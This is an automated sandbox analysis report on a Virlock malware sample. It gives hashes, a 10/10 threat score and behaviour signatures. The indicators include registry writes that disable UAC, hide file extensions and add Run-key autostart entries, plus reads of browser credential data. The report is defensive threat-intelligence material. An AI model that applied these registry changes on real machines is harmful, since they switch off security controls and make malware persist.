59426cd7f74386ffa6b60688e2b1bea72031ca9b8f706a746e0c4f1da28e1099

Analysis

max time kernel
150s
max time network
123s
platform
windows7_x64
resource
win7-20240319-en
resource tags

arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
submitted
29/03/2024, 02:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
Size

116KB
MD5

12260695d71062df9ea968a055fdbef2
SHA1

92bbd02bfd8c120a1f8dbe318df44eef0169ac6f
SHA256

59426cd7f74386ffa6b60688e2b1bea72031ca9b8f706a746e0c4f1da28e1099
SHA512

3362480b944bc3481a56b5f21ad893b7ee3004929d54fdadd5469d322a0c78ab4b4d323a454b5e916e53549ea1c0ef20a7840213f219e6799d9a019132b676c3
SSDEEP

3072:oD/79kC4hMNPpowSFcAN8OdxyTrjCMznKHB:oD/O1MNPqwSFtPdxyTXp

Score

10^/10

evasion persistence spyware stealer trojan

Malware Config

Signatures

Modifies visibility of file extensions in Explorer 2 TTPs 64 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"	reg.exe

UAC bypass 3 TTPs 64 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\International\Geo\Nation	xcYAwsIM.exe

Executes dropped EXE 2 IoCs

pid	Process
2928	xcYAwsIM.exe
2720	aCgkAQQg.exe

Loads dropped DLL 20 IoCs

pid	Process
2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe
2928	xcYAwsIM.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\aCgkAQQg.exe = "C:\\ProgramData\\kgYwAggM\\aCgkAQQg.exe"	aCgkAQQg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Run\xcYAwsIM.exe = "C:\\Users\\Admin\\naooscwU\\xcYAwsIM.exe"	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\aCgkAQQg.exe = "C:\\ProgramData\\kgYwAggM\\aCgkAQQg.exe"	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Windows\CurrentVersion\Run\xcYAwsIM.exe = "C:\\Users\\Admin\\naooscwU\\xcYAwsIM.exe"	xcYAwsIM.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico	xcYAwsIM.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
760	reg.exe
1408	reg.exe
2232	reg.exe
2504	reg.exe
2604	reg.exe
1144	reg.exe
1772	reg.exe
1332	reg.exe
1736	reg.exe
1376	reg.exe
1984	reg.exe
676	reg.exe
1848	reg.exe
1736	reg.exe
2420	reg.exe
2920	reg.exe
2380	reg.exe
856	reg.exe
2744	reg.exe
676	reg.exe
1448	reg.exe
2356	reg.exe
1836	reg.exe
2624	reg.exe
2752	reg.exe
2036	reg.exe
868	reg.exe
1060	reg.exe
884	reg.exe
1656	reg.exe
1516	reg.exe
2496	reg.exe
884	reg.exe
2588	reg.exe
1556	reg.exe
2132	reg.exe
2696	reg.exe
2480	reg.exe
2712	reg.exe
2860	reg.exe
1632	reg.exe
1228	reg.exe
612	reg.exe
2236	reg.exe
1512	reg.exe
1840	reg.exe
3056	reg.exe
2740	reg.exe
1848	reg.exe
3068	reg.exe
2832	reg.exe
708	reg.exe
2676	reg.exe
328	reg.exe
2896	reg.exe
1736	reg.exe
2552	reg.exe
2888	reg.exe
1764	reg.exe
2704	reg.exe
2260	reg.exe
2080	reg.exe
2712	reg.exe
1700	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2188	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2512	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2632	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2632	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
584	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
584	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1836	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1836	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1420	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1420	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
3004	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
3004	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2472	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2472	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1640	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1640	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2360	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2360	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
576	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
576	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2056	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2056	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2232	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2232	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2660	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2660	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2500	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2500	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2312	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2312	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2964	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2964	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2952	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2952	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2784	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2784	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2668	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2668	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2848	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2848	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
3032	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
3032	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1212	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1212	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2528	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2528	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1984	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1984	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2696	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
2696	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1508	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
1508	2024-03-29_12260695d71062df9ea968a055fdbef2_virlock.exe
